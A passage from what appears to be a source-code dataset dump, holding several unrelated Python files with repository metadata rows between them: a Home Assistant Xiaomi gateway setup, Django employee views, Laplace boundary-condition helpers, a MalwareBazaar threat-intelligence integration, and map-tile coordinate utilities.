    ])
async def _setup_domains(hass: HomeAssistant, entry: ConfigEntry):
    # init setup for each supported domains
    await asyncio.gather(*[
        hass.config_entries.async_forward_entry_setup(entry, domain)
        for domain in DOMAINS
    ])

    # start the gateway only after every platform is ready to add entities
    gw: Gateway3 = hass.data[DOMAIN][entry.entry_id]
    gw.start()
    # make sure the gateway is stopped on Hass shutdown
    hass.bus.async_listen_once(EVENT_HOMEASSISTANT_STOP, gw.stop)
async def _setup_micloud_entry(hass: HomeAssistant, config_entry):
    """Log in to MiCloud (or reuse a saved token), load the device list and
    cache it both in hass.data and in .storage."""
    data: dict = config_entry.data.copy()

    session = async_create_clientsession(hass)
    hass.data[DOMAIN]['cloud'] = cloud = MiCloud(session, data['servers'])

    if 'service_token' in data:
        # load devices with saved MiCloud auth
        cloud.auth = data
        devices = await cloud.get_devices()
    else:
        devices = None

    if devices is None:
        _LOGGER.debug(f"Login to MiCloud for {config_entry.title}")
        if await cloud.login(data['username'], data['password']):
            # update MiCloud auth in .storage
            data.update(cloud.auth)
            hass.config_entries.async_update_entry(config_entry, data=data)
            devices = await cloud.get_devices()
            if devices is None:
                _LOGGER.error("Can't load devices from MiCloud")

        else:
            _LOGGER.error("Can't login to MiCloud")

    # load devices from or save to .storage
    store = Store(hass, 1, f"{DOMAIN}/{data['username']}.json")
    if devices is None:
        _LOGGER.debug("Loading a list of devices from the .storage")
        devices = await store.async_load()
    else:
        _LOGGER.debug(f"Loaded from MiCloud {len(devices)} devices")
        await store.async_save(devices)

    if devices is None:
        _LOGGER.debug("No devices in .storage")
        return False

    # TODO: Think about a bunch of devices
    if 'devices' not in hass.data[DOMAIN]:
        hass.data[DOMAIN]['devices'] = devices
    else:
        hass.data[DOMAIN]['devices'] += devices

    # remember cloud device names as defaults for gateway device configs
    default_devices = hass.data[DOMAIN]['config']['devices']
    for device in devices:
        default_devices[device['did']] = {'device_name': device['name']}

    return True
async def _handle_device_remove(hass: HomeAssistant):
    """Remove device from Hass and Mi Home if the device is renamed to
    `delete`.
    """

    async def device_registry_updated(event: Event):
        if event.data['action'] != 'update':
            return

        registry = hass.data['device_registry']
        hass_device = registry.async_get(event.data['device_id'])

        # check empty identifiers
        if not hass_device or not hass_device.identifiers:
            return

        identifier = next(iter(hass_device.identifiers))
        # handle only our devices
        if identifier[0] != DOMAIN or hass_device.name_by_user != 'delete':
            return

        # remove from Mi Home: find the gateway that owns this device
        for gw in hass.data[DOMAIN].values():
            if not isinstance(gw, Gateway3):
                continue
            gw_device = gw.get_device(identifier[1])
            if not gw_device:
                continue
            gw.debug(f"Remove device: {gw_device['did']}")
            gw.miio.send('remove_device', [gw_device['did']])
            break

        # remove from Hass
        registry.async_remove_device(hass_device.id)

    hass.bus.async_listen('device_registry_updated', device_registry_updated)
async def _setup_logger(hass: HomeAssistant):
    """Enable integration debug logging when any config entry asks for it."""
    entries = hass.config_entries.async_entries(DOMAIN)
    any_debug = any(e.options.get('debug') for e in entries)

    # only if global logging don't set
    if not hass.data[DOMAIN]['debug']:
        # disable log to console
        _LOGGER.propagate = not any_debug
        # set debug if any of integrations has debug
        _LOGGER.setLevel(logging.DEBUG if any_debug else logging.NOTSET)

    # if don't set handler yet
    if any_debug and not _LOGGER.handlers:
        handler = XiaomiGateway3Debug(hass)
        _LOGGER.addHandler(handler)

        # log system info once when debug logging is first enabled
        info = await hass.helpers.system_info.async_get_system_info()
        info.pop('timezone')
        _LOGGER.debug(f"SysInfo: {info}")
| [
"saar1122@gmail.com"
] | saar1122@gmail.com |
decb4d0baec38c32d020228dd660883d73f27f13 | d7bc9f6a968de928f2bfc82aee93762c3b893c23 | /applications/persona/views.py | 8eb0996b561e588e75c07f57d364ffc7b3a7d814 | [] | no_license | Diego-David/Prueba2 | 04e47d4a1fbfd5c8f89a0f7b46deb4f728ca4916 | 261ca23d34ea1d59a6d79e3ce2ef5d524a0ad052 | refs/heads/master | 2023-07-06T19:00:24.604487 | 2021-07-22T04:00:07 | 2021-07-22T04:00:07 | 376,198,913 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,545 | py | from applications.persona.forms import EmpleadoForm
from applications import departamento
from applications.departamento.models import Departamento
from django.shortcuts import render
from django.views.generic import (ListView, DetailView,
CreateView,
TemplateView,
UpdateView,
DeleteView
)
from django.urls import reverse_lazy
# forms
from .models import Empleado
# Create your views here.
"""
# QUEREMOS CREAR 5 VISTAS:
# 1.- LISTAR TODOS LOS EMPLEADOS DE LA EMPRESA
"""
# Importamos los modelos con los que vamos a trabajar
from .models import Empleado, Habilidades
class InicioView(TemplateView):
    """Landing (home) page view."""
    template_name = 'inicio.html'
class ListaAllEmpleados(ListView):
    """Paginated list of every employee.

    Supports case-insensitive filtering by first name through the
    ``kword`` GET parameter (an empty keyword returns everyone).
    """
    template_name = 'persona/list_all.html'
    paginate_by = 4  # page size for ListView pagination
    ordering = 'id'
    # model = Empleado

    def get_queryset(self):
        # Debug prints removed; filter straight from the request.
        palabra_clave = self.request.GET.get("kword", '')
        return Empleado.objects.filter(
            first_name__icontains=palabra_clave
        )
class ListaEmpleadosAdmin(ListView):
    """Admin-facing paginated list of all employees, ordered by id."""
    template_name = 'persona/lista_empleados.html'
    paginate_by = 10  # page size for ListView pagination
    ordering = 'id'
    context_object_name = 'empleados'
    model = Empleado
"""
# 2.- QUEREMOS LISTAR A TODOS LOS EMPLEADOS QUE PERTENECEN A UN ÁREA DE LA EMPRESA
"""
class ListByAreaEmpleado(ListView):
    """Employees of a single department, chosen via the URL kwarg ``namev``."""
    template_name = 'persona/list_emple_area.html'
    context_object_name = 'empleados'
    """
    queryset = Empleado.objects.filter(
        departamento__name = 'Gerente General'
    )
    """
    # Alternative way of building the filter shown in the template:
    def get_queryset(self):
        # 'namev' is captured by the URLconf and used as the department key.
        area = self.kwargs['namev']
        # NOTE(review): 'shor_name' mirrors the (presumably misspelled)
        # Departamento model field -- confirm before renaming either side.
        lista = Empleado.objects.filter(
            departamento__shor_name = area
        )
        return lista
"""
# 3.- QUEREMOS LISTAR A LOS EMPLEADOS ingresando una PALABRA CLAVE
"""
class ListEmpleadosByKword(ListView):
    """Employee listing filtered by an exact first-name match (?kword=)."""
    template_name = 'persona/by_kword.html'
    context_object_name = 'empleados'

    def get_queryset(self):
        # Debug prints removed; exact (case-sensitive) first-name match.
        palabra_clave = self.request.GET.get("kword", '')
        return Empleado.objects.filter(
            first_name=palabra_clave
        )
"""
# 4.- QUEREMOS LISTAR las HABILIDADES
"""
class ListHabilidadesEmpleados(ListView):
    """Habilidades records matching the ?habilidad= GET parameter."""
    template_name = 'persona/habilidades.html'
    context_object_name = 'habilidades_object'
    """
    def get_queryset(self):
        empleado = Empleado.objects.get(id=1)
        #print(empleado.habilidades.all())
        return empleado.habilidades.all()
    """

    def get_queryset(self):
        # Debug prints removed; filter by the exact habilidad name.
        clave_habilidad = self.request.GET.get("habilidad", '')
        return Habilidades.objects.filter(
            habilidad=clave_habilidad
        )
class EmpleadoDetailView(DetailView):
    """Detail page for a single employee."""
    model = Empleado
    template_name = "persona/detail_empleado.html"
    def get_context_data(self, **kwargs):
        # Extend the default context with a heading used by the template.
        context = super(EmpleadoDetailView, self).get_context_data(**kwargs)
        context['titulo']='Empleado del mes'
        return context
class SuccesView(TemplateView):
    """Confirmation page shown after a successful create/update."""
    template_name = "persona/succes.html"
class EmpleadoCreateView(CreateView):
    """Registration form for a new employee, backed by EmpleadoForm."""
    model = Empleado
    template_name = "persona/createview_registrarPer.html"
    # fields = ['first_name', 'last_name', 'job', 'habilidades'] # picks only these fields
    # fields = ('__all__') # exposes every model field in the form
    form_class = EmpleadoForm
    success_url = reverse_lazy('persona_app:empleados_admin')
class EmpleadoUpdateView(UpdateView):
    """Edit form for an existing employee (subset of fields)."""
    model = Empleado
    template_name = "persona/persona_update.html"
    fields = ['first_name',
        'last_name',
        'job',
        'departamento',
        'habilidades'
        ]
    success_url = reverse_lazy('persona_app:empleados_admin')
class SuccesViewDelete(TemplateView):
    """Confirmation page shown after a successful delete."""
    template_name = "persona/successdelete.html"
class EmpleadoDeleteView(DeleteView):
    """Delete-confirmation view for an employee."""
    model = Empleado
    template_name = "persona/deleteview.html"
    success_url = reverse_lazy('persona_app:empleados_admin')
| [
"diego.gavilanes8343@utc.edu.ec"
] | diego.gavilanes8343@utc.edu.ec |
62aaacaaabe60a38b126cdf14ff87d91ffe8e9f2 | 5d5d74a611b92e8ca9a666d5772e833bf0991edf | /pattern/prblm11.py | 3aeab091dfa78b4a398ca08d1a7c24262d16b2d7 | [] | no_license | swastikkalyane27/prbml | 4aa5ade9b944a156f1a06f069ade0993e9b10017 | 22b0051ecb12235dd0c6f54a5917a12c329f96e4 | refs/heads/master | 2023-06-16T04:20:45.168136 | 2021-07-09T05:57:44 | 2021-07-09T05:57:44 | 384,338,517 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 54 | py | # 1
# 121
# 12321
# 1234321
# 123454321 | [
"swastik.kalyane27@gmail.com"
] | swastik.kalyane27@gmail.com |
4671be4985ea23943720181810dd6cfc8ee9eb62 | 038679b06ec65ffe64e9cc99345f5766941f94db | /var_funs.py | 1a10f3491f48ac23241e2aede210ed8125de4104 | [] | no_license | apreziosir/Flow_PT | cd3b7258793bda641ba7d12e4af0d718aa6a384d | 6dd09f20178eae6b2e19e8ed42a1376cae7d3f05 | refs/heads/master | 2021-07-13T08:11:27.874551 | 2017-10-17T22:26:33 | 2017-10-17T22:26:33 | 100,315,889 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,423 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Functions for script of Laplace's equation for pressure in Particle Tracking
model
Antonio Preziosi-Ribero / Universidad Nacional de Colombia
August 2017
"""
import numpy as np
# =============================================================================
# This function calculates the hm for the Laplace's equation of the particle
# tracking model
# =============================================================================
def alt_media(U, H, d):
    """Empirical hm for the Laplace pressure problem.

    Two power-law regimes split at H/d = 0.34 (exponents 3/8 and 3/2).
    """
    ratio = (H / d) / 0.34
    exponent = 3 / 8 if H / d <= 0.34 else 3 / 2
    return 0.28 * (U ** 2 / (2 * 9.81)) * ratio ** exponent
# =============================================================================
# Filling the vector with the boundary conditions that are going to be used for
# the Laplace's problem
# =============================================================================
def fill_tbc(Lx, Nx, hm, Lambda):
    """Top boundary condition sampled at the Nx cell centres of [0, Lx].

    Currently returns the linear *test* function 7*x; the physical sine
    condition is kept commented below for when testing is done (hm and
    Lambda are unused until then).
    """
    dx = Lx / Nx
    x = dx / 2 + dx * np.arange(Nx)  # cell-centre abscissae
    # Real function - should work if test function works:
    # return hm * np.sin((2 * np.pi / Lambda) * x)
    # Test function - just to test the program under known conditions
    return 7 * x
# =============================================================================
# Filling the bottom boundary condition according to problem
# It must vary (constant, linear)
# =============================================================================
def fill_bbc(Lx, Ly, Nx, hm, Lambda, bbc):
    """Bottom boundary condition at the Nx cell centres of [0, Lx].

    Currently returns the manufactured test solution evaluated at y = -Ly:
    6*x*(-Ly) + 7*x - 8*Ly.  The physical variants are kept commented
    below (hm, Lambda and bbc are unused until one is re-enabled).
    """
    dx = Lx / Nx
    x = dx / 2 + dx * np.arange(Nx)  # cell-centre abscissae
    # Sine wave with hydrostatic increment (just water column):
    # return hm * np.sin((2 * np.pi / Lambda) * x) + bbc
    # Constant value:
    # return np.full(Nx, bbc)
    # Test function - just to test the program under known conditions
    return 6 * x * (-Ly) + 7 * x - 8 * Ly
# =============================================================================
# Filling left boundary condition - According to top boundary condition
# =============================================================================
def fill_lbc(Ly, Ny, Tbc):
    """Left boundary condition at the Ny cell centres over depth [0, Ly].

    Currently the test function -8*y with y the positive cell-centre
    depth.  The hydrostatic / constant variants using Tbc are kept
    commented below and unused for now.
    """
    dy = Ly / Ny
    y = dy / 2 + dy * np.arange(Ny)  # cell-centre depths
    # Hydrostatic increment of pressure in the left boundary:
    # return Tbc + y
    # Constant value of pressure left boundary:
    # return np.full(Ny, Tbc)
    # Test function - just to test the program under known conditions
    return -8 * y
# =============================================================================
# Filling right boundary condition - According to top boundary condition
# =============================================================================
def fill_rbc(Lx, Ly, Nx, Ny, Tbc):
    """Right boundary condition at the Ny cell centres down the right edge.

    Currently the test function -6*Lx*y + 7*x, where y runs over the Ny
    cell-centre depths and x uses the x-spacing dx with the same index
    (this mirrors the original loop).  Tbc is unused for now.
    """
    dx = Lx / Nx
    dy = Ly / Ny
    idx = np.arange(Ny)
    y = dy / 2 + dy * idx  # cell-centre depths
    x = dx / 2 + dx * idx  # abscissae built with dx but indexed over Ny
    # Hydrostatic increment of pressure in the right boundary:
    # return Tbc + y
    # Constant value of pressure right boundary:
    # return np.full(Ny, Tbc)
    # Test function - just to test the program under known conditions
    return -6 * Lx * y + 7 * x
# =============================================================================
# Calculate positions of nodes (works for x and y)
# =============================================================================
def positions(Lx, Ly, Nx, Ny):
    """Cell-centre node table: column 0 = node id, 1 = x, 2 = y (negative down).

    Nodes are numbered row-major (x varies fastest): the column index is
    ic % Nx and the row index is ic // Nx.
    """
    dx = Lx / Nx
    dy = Ly / Ny
    xn = np.zeros((Nx * Ny, 3))  # node positions matrix
    for ic in range(0, Nx * Ny):
        xn[ic, 0] = int(ic)  # node id
        xn[ic, 1] = dx / 2 + (ic % Nx) * dx  # node x position (column)
        # BUGFIX: the row index is ic // Nx, not ic % Ny -- the old code
        # produced duplicated/diagonal coordinates instead of covering the grid.
        xn[ic, 2] = -dy / 2 - (ic // Nx) * dy  # node y position (row)
    return xn
| [
"apreziosir@unal.edu.co"
] | apreziosir@unal.edu.co |
aad3ab1abf6d1299b48f107d036bf3d579323977 | 2a1b8a671aceda6bc446f8ce26400aa84fa444a6 | /Packs/MalwareBazaar/Integrations/MalwareBazaar/MalwareBazaar.py | 99c29c578cf90e95546b390eaa97f99d11e81baa | [
"MIT"
] | permissive | demisto/content | 6d4722d46f0ff0beea2748e9f7de585bf91a78b4 | 890def5a0e0ae8d6eaa538148249ddbc851dbb6b | refs/heads/master | 2023-09-04T00:02:25.618032 | 2023-09-03T21:56:22 | 2023-09-03T21:56:22 | 60,525,392 | 1,023 | 1,921 | MIT | 2023-09-14T20:55:24 | 2016-06-06T12:17:02 | Python | UTF-8 | Python | false | false | 12,931 | py | import demistomock as demisto # noqa: F401
from CommonServerPython import * # noqa: F401
import copy
import urllib3
# Maps the samples-list 'sample_type' argument to the API query verb.
QUERIES = {
    "tag": "get_taginfo",
    "signature": "get_siginfo",
    "file_type": "get_file_type",
    "clamav": "get_clamavinfo",
    "imphash": "get_imphash",
    "yara_rule": "get_yarainfo",
    "issuer_cn": "get_issuerinfo"
}
# Human-readable messages for known error query_status values.
EXCEPTIONS_MESSAGES = {
    'illegal_sha256_hash': 'Illegal SHA256 hash provided.',
    'file_not_found': 'The file was not found or is unknown to MalwareBazaar.',
    'hash_not_found': 'The file (hash) you wanted to query is unknown to MalwareBazaar.',
    'illegal_hash': 'The hash you provided is not a valid SHA256 hash.',
    'user_blacklisted': 'Your API key is blacklisted.',
    'no_results': 'Your query yield no results.',
    'not_found': 'Tha value you wanted to query is unknown to MalwareBazaar.',
    'illegal': 'The text you provided is not valid.'
}
VENDOR_NAME = 'MalwareBazaar'
# Column order for the samples-list markdown table.
LIST_HEADERS = ['md5_hash', 'sha256_hash', 'sha1_hash', 'file_name', 'file_type', 'file_size', 'tags', 'first_seen',
                'last_seen']
# Column order for the file-reputation markdown table.
FILE_HEADERS = ['md5_hash', 'sha256_hash', 'sha1_hash', 'file_name', 'file_type', 'file_size', 'tags', 'first_seen',
                'last_seen', 'signature', 'ssdeep', 'reporter', 'imphash', 'yara_rules_names']
class Client(BaseClient):
    """HTTP client for the MalwareBazaar API (multipart form-data POSTs)."""

    def __init__(self, server_url, verify, proxy, headers, api_key):
        # api_key is optional; it is only required for write operations
        # (see malwarebazaar_comment_add_request).
        self.api_key = api_key
        super().__init__(base_url=server_url, verify=verify, proxy=proxy, headers=headers)

    def file_request(self, hash):
        """Fetch full metadata for a sample by hash ('get_info' query)."""
        response = self._http_request('POST',
                                      files={
                                          'query': (None, "get_info"),
                                          'hash': (None, hash)
                                      })
        return response

    def malwarebazaar_download_sample_request(self, sha256_hash):
        """Download the zipped sample; returns the raw Response object."""
        response = self._http_request('POST',
                                      files={
                                          'query': (None, "get_file"),
                                          'sha256_hash': (None, sha256_hash)
                                      },
                                      resp_type="response")
        return response

    def malwarebazaar_comment_add_request(self, sha256_hash, comment):
        """Attach a comment to a sample; raises when no API key is configured."""
        if self.api_key is None:
            raise Exception('API Key is required for this command')
        response = self._http_request('POST',
                                      headers={"API-KEY": self.api_key},
                                      files={
                                          'query': (None, "add_comment"),
                                          'sha256_hash': (None, sha256_hash),
                                          'comment': (None, comment)
                                      })
        return response

    def malwarebazaar_samples_list_request(self, sample_input, value, limit, query):
        """Run one of the list queries (see QUERIES).

        NOTE(review): 'issuer_cn' queries are deliberately sent without a
        'limit' field -- presumably the endpoint does not accept one; confirm
        against the MalwareBazaar API docs.
        """
        files = {
            'query': (None, query),
            sample_input: (None, value),
        }
        if not sample_input == 'issuer_cn':
            files.update({'limit': (None, limit)})
        response = self._http_request('POST',
                                      files=files)
        return response
def file_process(hash, reliability, raw_response, response_data) -> CommandResults:
    """Build the CommandResults for one file returned by file_command.

    Args:
        hash: the hash the user queried with.
        reliability: DBotScoreReliability of this source.
        raw_response: the full API response (kept as raw_response output).
        response_data: the single 'data' entry describing the sample.

    Returns:
        CommandResults for the relevant file, with a BAD DBot score and an
        'indicator-of' relationship to the sample's malware signature.
    """
    # Every sample known to MalwareBazaar is treated as malicious (score BAD).
    dbot_score = Common.DBotScore(
        indicator=hash,
        indicator_type=DBotScoreType.FILE,
        integration_name=VENDOR_NAME,
        score=Common.DBotScore.BAD,
        reliability=reliability,
        malicious_description=response_data.get('comment')
    )
    signature = response_data.get('signature')
    relationship = EntityRelationship(name='indicator-of',
                                      entity_a=hash,
                                      entity_a_type='File',
                                      entity_b=signature,
                                      entity_b_type=FeedIndicatorType.indicator_type_by_server_version(
                                          "STIX Malware"),
                                      source_reliability=reliability,
                                      brand=VENDOR_NAME)
    table_name = f'{VENDOR_NAME} File reputation for: {hash}'
    # Work on a deep copy so the context output keeps the original structure.
    humam_readable_data = copy.deepcopy(response_data)
    humam_readable_data.update({'yara_rules_names': []})
    # Flatten the yara rule dicts into a plain list of rule names for the table.
    rules = humam_readable_data.get('yara_rules', [])
    rules = rules if rules else []
    for rule in rules:
        humam_readable_data.get('yara_rules_names').append(rule.get('rule_name'))
    md = tableToMarkdown(table_name, t=humam_readable_data, headerTransform=string_to_table_header, removeNull=True,
                         headers=FILE_HEADERS)
    file_object = Common.File(md5=response_data.get('md5_hash'), sha256=response_data.get('sha256_hash'),
                              sha1=response_data.get('sha1_hash'), size=response_data.get('file_size'),
                              file_type=response_data.get('file_type'), dbot_score=dbot_score,
                              relationships=[relationship])
    return CommandResults(
        outputs_prefix='MalwareBazaar.File',
        outputs_key_field='md5_hash',
        outputs=response_data,
        raw_response=raw_response,
        indicator=file_object,
        relationships=[relationship],
        readable_output=md
    )
def check_query_status(response, is_list_command=False, sample_type=None):
    """Raise a descriptive exception unless the API response was successful.

    Args:
        sample_type: string, type of sample (tag, signature, etc.).
        is_list_command: True when called from the samples-list command, in
            which case statuses are decorated with the sample type
            (e.g. 'tag_not_found', 'illegal_tag').
        response: parsed JSON response from the API.
    """
    not_found_suffix = '_not_found'
    illegal_prefix = 'illegal_'
    query_status = response.get("query_status")
    if not query_status == "ok" and not query_status == "success":
        if is_list_command:
            if query_status == sample_type + not_found_suffix:
                raise Exception(EXCEPTIONS_MESSAGES.get('not_found'))
            # BUGFIX: 'illegal_' is a prefix ('illegal_tag'); the old code
            # built 'tagillegal_' and so never matched illegal-value statuses.
            if query_status == illegal_prefix + sample_type:
                raise Exception(EXCEPTIONS_MESSAGES.get('illegal'))
        if query_status in EXCEPTIONS_MESSAGES:
            raise Exception(EXCEPTIONS_MESSAGES.get(query_status))
        else:
            raise Exception(query_status)
def file_command(client: Client, args: Dict[str, Any]) -> List[CommandResults]:
    """File-reputation command.

    Args:
        client: MalwareBazaar client.
        args: 'file' - list of file hashes to look up.

    Returns:
        One CommandResults per hash; unknown hashes produce an
        Unknown-score indicator instead of an error.
    """
    reliability = demisto.params().get('integrationReliability', DBotScoreReliability.A)
    if DBotScoreReliability.is_valid_type(reliability):
        reliability = DBotScoreReliability.get_dbot_score_reliability_from_str(reliability)
    else:
        raise Exception("Please provide a valid value for the Source Reliability parameter.")
    file_list = argToList(args.get('file'))
    command_results: List[CommandResults] = []
    for hash in file_list:
        raw_response = client.file_request(hash)
        if raw_response.get('query_status') == 'hash_not_found':
            # Unknown hash: emit an Unknown-score indicator rather than failing.
            command_results.append(create_indicator_result_with_dbotscore_unknown(hash, DBotScoreType.FILE, reliability))
        else:
            check_query_status(raw_response)
            response_data = raw_response.get('data')[0]
            # Blank out the placeholder name 'file' so it is not shown as real.
            if file_name := response_data.get('file_name'):
                response_data['file_name'] = '' if file_name == 'file' else file_name
            command_results.append(file_process(hash, reliability, raw_response, response_data))
    return command_results
def malwarebazaar_download_sample_command(client: Client, args: Dict[str, Any]) -> CommandResults:
    """Download a malware sample by SHA256 hash and return it as a zip file entry."""
    sha256_hash = args.get("sha256_hash")
    api_response = client.malwarebazaar_download_sample_request(sha256_hash)
    zip_name = f'{sha256_hash}.zip'
    return fileResult(zip_name, api_response.content)
def malwarebazaar_comment_add_command(client: Client, args: Dict[str, Any]) -> CommandResults:
    """Add a comment to a sample.

    Args:
        client: MalwareBazaar client (must be configured with an API key).
        args: 'sha256_hash' of the file and the 'comment' text to attach.

    Returns:
        CommandResults echoing the hash/comment; raises on API error.
    """
    sha256_hash = args.get("sha256_hash")
    comment = args.get("comment")
    response = client.malwarebazaar_comment_add_request(sha256_hash, comment)
    check_query_status(response)
    readable_output = f'Comment added to {sha256_hash} malware sample successfully'
    outputs = {
        'sha256_hash': sha256_hash,
        'comment': comment,
    }
    return CommandResults(
        outputs_prefix='MalwareBazaar.MalwarebazaarCommentAdd',
        outputs_key_field='sha256_hash',
        outputs=outputs,
        readable_output=readable_output,
        raw_response=response,
    )
def malwarebazaar_samples_list_command(client: Client, args: Dict[str, Any]) -> CommandResults:
    """List samples matching a query value.

    Args:
        client: MalwareBazaar client.
        args: sample_type - {clamav, file_type, imphash, signature, tag, yara_rule, issuer_cn}
              sample_value
              limit (optional) - number of results (default 50)
              page / page_size (optional) - client-side pagination.

    Returns:
        CommandResults with the matching sample records.
    """
    sample_input = args.get("sample_type") or ''
    value = args.get("sample_value")
    limit = arg_to_number(args.get("limit")) if "limit" in args else None
    page = arg_to_number(args.get("page")) if "page" in args else None
    page_size = arg_to_number(args.get("page_size")) if "page_size" in args else None
    # If limit was provided, request that many results from the API; else
    # derive the request size from page * page_size (default 50 when
    # neither pagination nor limit was given).
    if limit is None:
        if page is not None and page_size is not None:
            if page <= 0:
                raise Exception('Chosen page number must be greater than 0')
            limit = page_size * page
        else:
            limit = 50
    # 1000 is the maximal value we can get from the API
    limit = min(limit, 1000)
    query = QUERIES.get(sample_input)
    response = client.malwarebazaar_samples_list_request(sample_input, value, limit, query)
    check_query_status(response, True, args.get('sample_type'))
    response_data = response.get('data')
    # Client-side pagination: page N is the last page_size records of the
    # first page*page_size results requested above.
    if page is not None and page_size is not None:
        response_data = response_data[-1 * page_size:]
    readable_output = tableToMarkdown('Sample List', t=response_data, headerTransform=string_to_table_header,
                                      removeNull=True, headers=LIST_HEADERS)
    return CommandResults(
        outputs_prefix='MalwareBazaar.MalwarebazaarSamplesList',
        outputs_key_field='sha256_hash',
        readable_output=readable_output,
        outputs=response_data,
        raw_response=response
    )
def test_module(client: Client) -> None:
    """Integration connectivity test.

    Exercises a write call (which also validates the API key) when a key is
    configured, otherwise a read-only list query; fails on a bad query_status.
    """
    if client.api_key:
        response = client.malwarebazaar_comment_add_request(
            "094fd325049b8a9cf6d3e5ef2a6d4cc6a567d7d49c35f8bb8dd9e3c6acf3d78d",
            "test comment")
    else:
        response = client.malwarebazaar_samples_list_request('tag', 'TrickBot', '2', QUERIES.get('tag'))
    check_query_status(response)
    return_results('ok')
def main() -> None:
    """Read params/args, dispatch the requested command, report errors to the platform."""
    params: Dict[str, Any] = demisto.params()
    args: Dict[str, Any] = demisto.args()
    url = params.get('url')
    api_key = params.get('credentials', {}).get('password') or None
    verify_certificate: bool = not params.get('insecure', False)
    proxy = params.get('proxy', False)
    command = demisto.command()
    demisto.debug(f'Command being called is {command}')
    try:
        urllib3.disable_warnings()
        client: Client = Client(urljoin(url, '/api/v1/'), verify_certificate, proxy, headers={}, api_key=api_key)
        # Command name -> handler dispatch table.
        commands = {
            'file': file_command,
            'malwarebazaar-download-sample': malwarebazaar_download_sample_command,
            'malwarebazaar-comment-add': malwarebazaar_comment_add_command,
            'malwarebazaar-samples-list': malwarebazaar_samples_list_command,
        }
        if command == 'test-module':
            test_module(client)
        elif command in commands:
            return_results(commands[command](client, args))
        else:
            raise NotImplementedError(f'{command} command is not implemented.')
    except Exception as e:
        # Any failure is surfaced as a platform error entry.
        return_error(str(e))
return_error(str(e))
if __name__ in ['__main__', 'builtin', 'builtins']:
main()
| [
"noreply@github.com"
] | demisto.noreply@github.com |
a8df33ce068e346562a4a9998cf2ad561eddae31 | cd3dea8520f5d1acfff7ff1f1cbad7b3b35140e5 | /data/UtilityGeography.py | 75ea2d0da182e0a4d70100e2ef45cc653b1e6c70 | [] | no_license | jtpils/ETH-Thesis | 1577ac30b902e9e61cccb8b6073e3d6a709b974a | 2584189da3304b5cad43043248090df12f5adcef | refs/heads/master | 2020-05-17T12:47:49.040323 | 2019-02-24T20:13:25 | 2019-02-24T20:13:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,230 | py | import math
import Config
config = Config.Config()
def lonLatToWorld(lon, lat):
    """Project lon/lat (degrees) onto the single TILE_SIZE "world" tile.

    Clamping sin(lat) to +/-0.9999 effectively limits latitude to about
    89.189 degrees -- roughly a third of a tile past the world tile's edge.
    """
    siny = math.sin(math.pi * float(lat) / 180.0)
    siny = max(-0.9999, min(siny, 0.9999))
    world_x = config.TILE_SIZE * (0.5 + float(lon) / 360.0)
    world_y = config.TILE_SIZE * (0.5 - math.log((1 + siny) / (1 - siny)) / (4 * math.pi))
    return (world_x, world_y)
def lonLatToPixel(lon, lat, z, mode = 'int'):
    """Pixel coordinates at zoom z; mode 'int' floors to whole pixels."""
    assert mode in ('int', 'float')
    scale = 2 ** z
    wx, wy = lonLatToWorld(lon, lat)
    px, py = wx * scale, wy * scale
    if mode == 'int':
        return (math.floor(px), math.floor(py))
    return (px, py)
def lonLatToTile(lon, lat, z, mode = 'float'):
    """Tile coordinates at zoom z; mode 'int' floors to whole tile indices."""
    assert mode in ('int', 'float')
    scale = 2 ** z
    wx, wy = lonLatToWorld(lon, lat)
    tx = wx * scale / config.TILE_SIZE
    ty = wy * scale / config.TILE_SIZE
    if mode == 'int':
        return (math.floor(tx), math.floor(ty))
    return (tx, ty)
def pixelToLonLat(px, py, z):
    """Inverse projection: lon of the pixel's left edge, lat of its upper edge."""
    scale = float(2 ** z)
    world_x = float(px) / scale / config.TILE_SIZE
    world_y = float(py) / scale / config.TILE_SIZE
    lon = (world_x - 0.5) * 360.0
    e = math.exp((0.5 - world_y) * 4 * math.pi)
    lat = math.asin((e - 1.0) / (e + 1.0)) / math.pi * 180.0
    return lon, lat
class BoundingBox(object):
    """Pixel-space bounding box of width x height centred on (c_lon, c_lat).

    Works at an effective zoom of ``zoom + scale - 1`` -- presumably so an
    image scale factor maps onto extra zoom levels; confirm with callers.
    """
    def __init__(self, c_lon, c_lat, width, height, zoom, scale):
        self.w, self.h = width, height
        self.z = zoom + scale - 1
        # Pixel coordinates of the image centre, relative to the image origin.
        self.c_rpx, self.c_rpy = math.floor(width / 2), math.floor(height / 2)
        # Absolute (world) pixel coordinates of the geographic centre.
        self.c_px, self.c_py = lonLatToPixel(c_lon, c_lat, self.z)
        # Lon/lat of the pixel that actually sits at the image centre.
        self.tc_lon, self.tc_lat = self.relativePixelToLonLat(self.c_rpx, self.c_rpy)
    def lonLatToRelativePixel(self, lon, lat, int_res = True):
        """Map lon/lat to pixel coordinates relative to this box's origin."""
        px, py = lonLatToPixel(lon, lat, self.z, 'float')
        if int_res:
            return math.floor(px - self.c_px + self.c_rpx), math.floor(py - self.c_py + self.c_rpy)
        else:
            return px - self.c_px + self.c_rpx, py - self.c_py + self.c_rpy
    def relativePixelToLonLat(self, x, y):
        """Map box-relative pixel coordinates back to lon/lat."""
        x = self.c_px + x - self.c_rpx
        y = self.c_py + y - self.c_rpy
        return pixelToLonLat(x, y, self.z)
| [
"li.zuoyue@foxmail.com"
] | li.zuoyue@foxmail.com |
3f6aac45b00af3515394080a54a03db8bede5095 | 341b8435b388d6ef40bdf44d676ba93727998dad | /modules/cli.py | a1b1ed830e4aa401ecabdccc764270fa1321731a | [
"MIT"
] | permissive | antipatico/pytoyir | 12abd31e9550d184b67c3ea26b906d0da868c0ce | ec87b51d5d6efd7d4449586d04093c7c49c4ac51 | refs/heads/master | 2020-04-19T17:20:43.672363 | 2019-01-30T11:53:06 | 2019-01-30T11:53:06 | 168,332,498 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 393 | py | from .utils import lazyInt
def confirm(question):
    """Print *question* and read a y/N answer; only an explicit yes returns True."""
    print(question, "(y/N) ", end="")
    reply = input()
    return reply in ("y", "Y", "yes", "YES")
def selectOptionsText(question, options):
    """Prompt until the user picks a valid option index; return that option.

    Relies on lazyInt() from .utils to turn the raw input into an int --
    presumably it returns a non-index sentinel on bad input so the loop
